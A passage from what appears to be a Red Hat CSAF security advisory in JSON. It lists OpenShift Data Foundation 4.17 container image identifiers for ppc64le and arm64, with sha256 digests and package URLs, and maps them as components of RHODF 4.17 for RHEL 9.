"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product_id": "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9\u0026tag=v4.17.0-53"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product_id": "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product": {
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product_id": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
},
